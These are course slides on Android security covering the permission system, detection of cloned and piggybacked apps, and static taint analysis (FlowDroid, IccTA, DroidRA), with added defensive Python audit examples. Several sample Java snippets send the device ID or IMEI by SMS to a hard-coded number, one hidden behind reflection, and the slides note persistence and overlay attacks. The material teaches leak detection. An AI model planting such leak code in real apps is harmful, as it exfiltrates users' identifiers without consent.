FIT5003 Software Security
Mobile Security II
Android Permission System
– activity
  – restricts access to the activity
  – checked when starting the activity
  – throws SecurityException if the caller does not have the required permission
– service
  – restricts who can start, stop or bind to the service
– receiver
  – restricts who can send broadcasts to the BroadcastReceiver
  – checked at delivery, after the broadcast was sent
  – does not throw an exception in case of permission failure
– provider
  – restricts who can access the data
  – separate read and write permissions
  – checked when performing operations (e.g. query, insert)
Android Permission System
Android Framework Security
– Mandatory Access Control (MAC) enforced by the middleware
– Components protected using access permission labels declared in the AndroidManifest file
  – cannot be changed after installation
– 4 protection levels
  – normal – always granted
  – dangerous – requires user approval
  – signature – matching certificate
  – signatureOrSystem – matching certificate, or the app is part of the system image
Android Permission System
– At install time each application requests a list of permissions
– All permissions must be granted at install time – all or nothing
– Protect access to Android components, services and APIs, e.g. the API for access to the phone’s hardware
– ∼130 API-defined permissions in the Manifest.permission class
– Custom permissions defined by developers
  – name conflicts may appear
  – current research on Android permissions doesn’t take them into consideration
Examples of Permissions
– INTERNET (string: “android.permission.INTERNET”)
– ACCESS_NETWORK_STATE, ACCESS_WIFI_STATE, CHANGE_NETWORK_STATE, READ_PHONE_STATE
– ACCESS_COARSE_LOCATION, ACCESS_FINE_LOCATION
– READ_SMS, RECEIVE_SMS, SEND_SMS
– ANSWER_PHONE_CALLS, CALL_PHONE, READ_CALL_LOG, WRITE_CALL_LOG
– READ_CONTACTS, WRITE_CONTACTS
– READ_CALENDAR, WRITE_CALENDAR
– READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE
– RECORD_AUDIO, CAMERA
– BLUETOOTH, NFC
– RECEIVE_BOOT_COMPLETED
– SYSTEM_ALERT_WINDOW
– SET_WALLPAPER
{READ,WRITE}_EXTERNAL_STORAGE
– Each app has access to a private directory
  – No other apps can access this directory *
– The device offers an “external storage”
  – In the past: a physical “removable” SD card
  – Currently: part of the file system that apps can use to share files – “/sdcard”
RECEIVE_BOOT_COMPLETED
– When the system boots, it broadcasts an Intent with the “ACTION_BOOT_COMPLETED” action
– An app can declare an intent filter for this intent so that it can automatically start at boot!
– Useful to gain persistence / survive reboots
– And that’s why the Android folks added a permission requirement
– Note: the app needs to be manually started to receive it
SYSTEM_ALERT_WINDOW
– Draw arbitrary windows/overlays on top of other apps
  – Can be completely custom: position, shape, content, transparency
  – Can be clickable or pass-through
– It leads to many UI attacks
  – UI confusion, clickjacking, phishing
  – Teaser: Cloak & Dagger
Permission Granting
– Normal permissions
  – no explicit granting necessary
– Dangerous permissions
  – The user needs to be asked
– Signature permissions
  – It depends
  – Granted at install time when the app is signed by the same certificate as the defining app
  – Otherwise, the user is asked
– Not all of these are available to third-party apps
Permission Request
…
Custom Permissions (doc)
– Apps can define “custom” permissions!
– The “system” permissions are defined in the same way – in AndroidManifest.xml
Components Permission Enforcement
– Apps’ components can specify which permissions are required to use them
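Added example (not from the lecture or from Android’s own tooling): a small manifest audit in Python that reads the protection level of a custom permission and lists which explicitly exported components carry a permission label, so the enforcement described on the last few slides can be checked on a real manifest. The sample manifest, its package name and its component names are constructed for this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample manifest (package and component names are hypothetical): one
# custom signature-level permission, four exported components, three of them guarded.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.lecture">
  <permission android:name="com.example.lecture.permission.ADMIN"
              android:protectionLevel="signature" />
  <application>
    <activity android:name=".AdminActivity" android:exported="true"
              android:permission="com.example.lecture.permission.ADMIN" />
    <receiver android:name=".NetReceiver" android:exported="true"
              android:permission="com.example.lecture.permission.ADMIN" />
    <provider android:name=".DataProvider" android:exported="true"
              android:authorities="com.example.lecture.data"
              android:readPermission="com.example.lecture.permission.ADMIN"
              android:writePermission="com.example.lecture.permission.ADMIN" />
    <service android:name=".SyncService" android:exported="true" />
  </application>
</manifest>
"""

def attr(elem, name):
    """Read an android:-namespaced attribute (None if absent)."""
    return elem.get(ANDROID_NS + name)

def custom_permission_levels(manifest_xml):
    """Map each <permission> the app defines to its protectionLevel
    (the platform treats a missing attribute as "normal")."""
    root = ET.fromstring(manifest_xml.strip())
    return {attr(p, "name"): attr(p, "protectionLevel") or "normal"
            for p in root.iter("permission")}

def audit_exported_components(manifest_xml):
    """Map every explicitly exported component to the permission labels guarding it
    (providers may carry separate read/write labels); an empty list means any app can reach it."""
    root = ET.fromstring(manifest_xml.strip())
    findings = {}
    for tag in COMPONENT_TAGS:
        for comp in root.iter(tag):
            if attr(comp, "exported") != "true":
                continue  # implicit exports via intent-filters are not modelled here
            labels = [attr(comp, a) for a in ("permission", "readPermission", "writePermission")]
            findings[attr(comp, "name")] = [label for label in labels if label]
    return findings
```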
Android Permission System
Are users paying attention to the permissions? Do users understand the permissions?
Can users make correct security decisions?
Permission maps: Stowaway [1], PScout [2], Bartel et al. [3]
[1] Felt, Adrienne Porter, Erika Chin, Steve Hanna, Dawn Song, and David Wagner. “Android permissions demystified.” In Proceedings of the 18th ACM Conference on Computer and Communications Security (CCS 2011), pp. 627-638. ACM, 2011.
[2] Kathy Wain Yee Au, Yi Fan Zhou, Zhen Huang and David Lie. “PScout: Analyzing the Android Permission Specification.” In Proceedings of the 19th ACM Conference on Computer and Communications Security (CCS 2012). 2012.
[3] Alexandre Bartel, Jacques Klein, Martin Monperrus, Yves Le Traon. “Static Analysis for Extracting Permission Checks of a Large Scale Framework: The Challenges and Solutions for Analyzing Android.” IEEE Transactions on Software Engineering (TSE), 2014.
Identifying Mobile Security Issues
Mobile Security
– Static Analysis
– Dynamic Analysis
Tan, Darell JJ, Tong-Wei Chua, and Vrizlynn LL Thing. “Securing Android: a survey, taxonomy, and challenges.” ACM Computing Surveys (CSUR) 47, no. 4 (2015): 58.
Mobile Security
STRIDE
“A Taxonomy and Qualitative Comparison of Program Analysis Techniques for Security Assessment of Android Software”
Alireza Sadeghi, Hamid Bagheri, Joshua Garcia, and Sam Malek
IEEE Transactions on Software Engineering (TSE), Vol. 43, Issue 6, June 2017
Mobile Security
– Clone Detection
– Malware Analysis
– Privacy Leak
Clone Detection
[Figure: a piggybacked app = carrier (the original app) + hook + rider (the malicious payload)]
Wu Zhou, Yajin Zhou, Michael Grace, Xuxian Jiang, and Shihong Zou. “Fast, scalable detection of ‘piggybacked’ mobile applications.” In CODASPY ’13, pages 185–196, New York, NY, USA, 2013.
Clone Detection
Cloning is the process of building software by reverse engineering another piece of software or by re-implementing it based on documentation or usage experience.
Repackaging refers to the core process of unpacking a software package, then repackaging it after a probable modification of the decompiled code and/or of other resource files (e.g. logos, permission list, etc.).
Piggybacking is defined in the literature as a malware development activity where a given benign app is repackaged to include a malicious payload. Piggybacked apps thus constitute a subset of repackaged apps.
Clone Detection
– Similarity Comparison
– Symptom Discovery
– (Un)Supervised Learning
– Runtime Monitoring
Clone Detection
Similarity Computation Algorithms
Clone Detection
Plugin-based Framework: SimiDroid
Li, Li, Tegawendé F. Bissyandé and Jacques Klein. “SimiDroid: Identifying and Explaining Similarities in Android Apps.” 2017 IEEE Trustcom/BigDataSE/ICESS (2017): 136-143.
https://github.com/lilicoding/SimiDroid
Comparison plugins: Method, Component, Resource
Clone Detection
Comparison results are classified per key/value pair:
– identical: both key and value are exactly the same
– similar: same key but different value
– new: key is new (only in the compared app)
– deleted: key is deleted (only in the original app)
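Added example, not code from SimiDroid or the lecture: a Python comparison of two per-method feature maps that classifies keys as identical/similar/new/deleted as on the slide above. The fingerprinting helper (with optional abstraction of string constants, so a swapped ad-unit id is not reported as a modified method) and the identical/(total − new) score are assumptions of this example, and both method maps are constructed.

```python
import hashlib
import re

def method_fingerprint(body, abstract_strings=False):
    """Hash a method body (here: a Jimple-like statement string).  With
    abstract_strings=True every string constant becomes "S", so a clone that
    only swapped an ad-unit id is no longer reported as a modified method."""
    if abstract_strings:
        body = re.sub(r'"[^"]*"', '"S"', body)
    return hashlib.sha1(body.encode()).hexdigest()

def compare_maps(base, other):
    """Classify keys of two feature maps the way the slide does."""
    result = {"identical": [], "similar": [], "new": [], "deleted": []}
    for key, value in base.items():
        if key not in other:
            result["deleted"].append(key)
        elif other[key] == value:
            result["identical"].append(key)
        else:
            result["similar"].append(key)
    result["new"] = [k for k in other if k not in base]
    return result

def similarity_score(result):
    """Assumed scoring rule (not taken from the slides): identical / (total - new),
    so code the repackager added does not dilute how much of the original survives."""
    counts = {k: len(v) for k, v in result.items()}
    denominator = sum(counts.values()) - counts["new"]
    return counts["identical"] / denominator if denominator else 0.0

def compare_apps(base_methods, other_methods, abstract_strings=False):
    """Build method-signature -> fingerprint maps for both apps and compare them."""
    fp = lambda methods: {sig: method_fingerprint(b, abstract_strings) for sig, b in methods.items()}
    return compare_maps(fp(base_methods), fp(other_methods))

# Constructed sample: the clone swapped the ad-unit id, dropped a helper and added an ad-push method.
ORIGINAL = {
    "Start.callAdds()": 'virtualinvoke $r1.setAdUnitId("orig-ad-unit-id")',
    "Start.onCreate(Bundle)": "specialinvoke $r0.onCreate($r1)",
    "Util.helper()": "return",
}
CLONE = {
    "Start.callAdds()": 'virtualinvoke $r1.setAdUnitId("repackager-ad-unit-id")',
    "Start.onCreate(Bundle)": "specialinvoke $r0.onCreate($r1)",
    "AdPush.start()": "staticinvoke AdPush.schedule()",
}
```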
Clone Detection
Symptom Discovery
Symptom Discovery builds on the intuitive assumption that repackaging processes leave marks on the repackaged apps. If such marks can be fully characterized, it is possible to spot the symptoms in apps.
AndroidSOO has recently introduced and explored a novel and easily extractable attribute called String Offset Order, which is extracted from the string identifiers list in the classes.dex bytecode file.
Clone Detection
(Un)Supervised Learning
Clone Detection
Runtime Monitoring
– Watermarking
– Birthmarking
Clone Detection
– Detecting Clone Apps
– Understanding Cloning in Android
Clone Detection
(1) Constant String Replacement.
class Start extends Activity {
  void callAdds() {
    $r1 = $r0.
-   virtualinvoke $r1.setAdUnitId("a1522d5c390a573");
+   virtualinvoke $r1.setAdUnitId("ca-app-pub-8182614411920503/1232098473");
  }
}
Clone Detection
(1) Constant String Replacement. (2) New Method Call.
class UnityPlayerProxyActivity extends Activity {
  protected void onCreate(Bundle) {
    specialinvoke $r0.onCreate($r1);
+   $r2 = newarray (java.lang.String)[2];
+   staticinvoke
  }
}
Clone Detection
(1) Constant String Replacement. (2) New Method Call.
(3) Library Impact.
Clone Detection
(1) Constant String Replacement. (2) New Method Call.
(3) Library Impact.
(4) Duplicated Component Capabilities.
receiver: “com.kuguo.ad.MainReceiver”
  intent-filter
    action: “android.net.conn.CONNECTIVITY_CHANGE”
receiver: “net.crazymedia.iad.AdPushReceiver”
  intent-filter
    action: “android.net.conn.CONNECTIVITY_CHANGE”
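Added example (not from SimiDroid or the lecture) that generalizes the duplicated-capability symptom above into a manifest check: it groups components by the intent-filter actions they register and flags actions claimed by more than one component of the same kind. The two ad receivers are the ones named on the slide; the package name, the BootReceiver and the out-of-package heuristic are assumptions of this example.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest: the two ad receivers are the ones named on the slide,
# the package name and the BootReceiver are hypothetical.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.game">
  <application>
    <receiver android:name="com.example.game.BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED" /></intent-filter>
    </receiver>
    <receiver android:name="com.kuguo.ad.MainReceiver">
      <intent-filter><action android:name="android.net.conn.CONNECTIVITY_CHANGE" /></intent-filter>
    </receiver>
    <receiver android:name="net.crazymedia.iad.AdPushReceiver">
      <intent-filter><action android:name="android.net.conn.CONNECTIVITY_CHANGE" /></intent-filter>
    </receiver>
  </application>
</manifest>"""

def component_capabilities(manifest_xml):
    """Yield (component tag, component name, intent-filter action) triples."""
    root = ET.fromstring(manifest_xml)
    for tag in ("activity", "service", "receiver"):
        for comp in root.iter(tag):
            for action in comp.iter("action"):
                yield tag, comp.get(ANDROID_NS + "name"), action.get(ANDROID_NS + "name")

def duplicated_capabilities(manifest_xml):
    """Return {(tag, action): [component names]} for every capability that more
    than one component of the same kind declares; in a piggybacked app the
    duplicate is typically rider code (here: two ad SDKs both waking up on
    connectivity changes)."""
    by_capability = defaultdict(list)
    for tag, name, action in component_capabilities(manifest_xml):
        by_capability[(tag, action)].append(name)
    return {cap: names for cap, names in by_capability.items() if len(names) > 1}

def foreign_components(manifest_xml):
    """Heuristic (an assumption of this example, not a SimiDroid rule): components
    whose class lives outside the app's own package are likely rider/library code."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    return sorted({name for _, name, _ in component_capabilities(manifest_xml)
                   if not name.startswith(package + ".")})
```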
Malware Analysis
Malware Analysis
Machine Learning-based Malware Detection
Malware Analysis
Example: CHABADA
Privacy Leak
Privacy Leak
Taint Analysis
– source
– sink
Privacy Leak
public class Activity_A {
  void onCreate(Bundle b) {
    String id = telManager.getDeviceId();                  // source
    // ...
    String alias = id;
    String number = "+3524666445556";
    sms.sendTextMessage(number, null, alias, null, null);  // sink
  }
}
Privacy Leak
FlowDroid: Precise Context, Flow, Field, Object-sensitive and Lifecycle-aware Taint Analysis for Android Apps
– Multiple Entrypoints
– Callback methods
Privacy Leak
– Multiple Entrypoints (Main Launcher)
– Callback methods
– Dummy main methods
Privacy Leak
Static Taint Analysis
– Build Sound Call Graph
Privacy Leak
[Figure: APP – Activity_A calls the ICC method startActivity(), which passes through the Android Framework before Activity_B is reached]
Privacy Leak
Activity_A
  String id = telManager.getDeviceId();                  // source
  Intent intent = new Intent(this, Activity_B.class);
  intent.putExtra("sensitive", id);
  startActivity(intent);
Broken Call Graph (CFG): the analysis sees no edge from startActivity() in Activity_A into Activity_B’s onCreate(), so the flow from the source to the sink is missed
Activity_B
  void onCreate(Bundle b) {
    Intent intent = getIntent();
    String id = intent.getStringExtra("sensitive");
    String number = "+3524666445556";
    sms.sendTextMessage(number, null, id, null, null);    // sink
  }
Privacy Leak
IccTA
– ICC Links Building
– Call Graph Bridging
– Resolving Intent Values (Constant String Propagation)
Activity_A {
  Intent: { targetcomp: Activity_B }
}
Privacy Leak
IccTA – Call Graph Bridging
Activity_A
-   startActivity(intent);                     // ICC link to Activity_B
+   Activity_B a2 = new Activity_B(intent);
+   a2.dummyMain();
Activity_B
    private Intent intent = null;
    public Activity_B(Intent intent) {
      this.intent = intent;
    }
    @Override
    public Intent getIntent() {
      return this.intent;
    }
    void dummyMain() {
      Intent i = getIntent();
      // Lifecycle/Callback methods
    }
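The call-graph bridging just shown and the source-to-sink flow from the earlier Activity_A example, as an added toy taint tracker in Python (not FlowDroid or IccTA code): the statement IR, the component names and the extra keys are constructed for this example. Without bridging the callee is never analysed with the caller’s intent, which is the broken-call-graph case; with bridging the extras carried by the intent hand the taint to Activity_B, as the generated constructor and dummyMain() do in IccTA.

```python
# Statement IR (constructed for this example): each component is a list of tuples.
#   ("source", v)            v = telManager.getDeviceId()
#   ("assign", dst, src)     dst = src
#   ("put_extra", key, v)    intent.putExtra(key, v)
#   ("start_activity", comp) startActivity(intent) targeting comp
#   ("get_extra", v, key)    v = getIntent().getStringExtra(key)
#   ("sink", v)              sms.sendTextMessage(..., v, ...)
APP = {
    "Activity_A": [("source", "id"), ("put_extra", "sensitive", "id"),
                   ("start_activity", "Activity_B")],
    "Activity_B": [("get_extra", "id", "sensitive"), ("sink", "id")],
}
# Intra-component flow from the earlier slide: alias = id reaches the sink directly.
INTRA = {"Activity_A": [("source", "id"), ("assign", "alias", "id"), ("sink", "alias")]}

def analyze_component(app, name, incoming_extras, bridge_icc, leaks):
    """Forward taint propagation over one component.  incoming_extras maps intent
    extra keys to a taint flag, playing the role of IccTA's generated
    Activity_B(intent) constructor; leaks collects (component, variable) pairs."""
    tainted = set()
    outgoing_extras = {}
    for stmt in app[name]:
        op = stmt[0]
        if op == "source":
            tainted.add(stmt[1])
        elif op == "assign":
            _, dst, src = stmt
            if src in tainted:
                tainted.add(dst)
            else:
                tainted.discard(dst)
        elif op == "put_extra":
            _, key, var = stmt
            outgoing_extras[key] = var in tainted
        elif op == "get_extra":
            _, var, key = stmt
            if incoming_extras.get(key, False):
                tainted.add(var)
        elif op == "sink":
            if stmt[1] in tainted:
                leaks.append((name, stmt[1]))
        elif op == "start_activity" and bridge_icc:
            # Call graph bridging: analyse the callee with this intent's extras.
            analyze_component(app, stmt[1], outgoing_extras, bridge_icc, leaks)
    return leaks

def find_leaks(app, entry, bridge_icc):
    """Return [(component, variable)] for every tainted value reaching a sink."""
    return analyze_component(app, entry, {}, bridge_icc, [])
```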
Privacy Leak
Inter-Component Call Graph
Privacy Leak
[Figure: APP – Activity_A → Reflective Method → Reflective Method → ICC Method startActivity() → Activity_B]
Privacy Leak
String imei = telephonyManager.getDeviceId();                 // source
Class<?> c = Class.forName("de.ecspride.ReflectiveClass");
Object o = c.newInstance();
Method m = c.getMethod("setIme" + "i", String.class);
m.invoke(o, imei);
Method m2 = c.getMethod("getImei");
String s = (String) m2.invoke(o);
SmsManager sms = SmsManager.getDefault();
sms.sendTextMessage("+49 1234", null, s, null, null);         // sink
Privacy Leak
DroidRA
1) To infer target values of reflective calls.
   m.invoke(o, imei); // o.setImei(imei);
2) To replace reflective calls with traditional Java calls.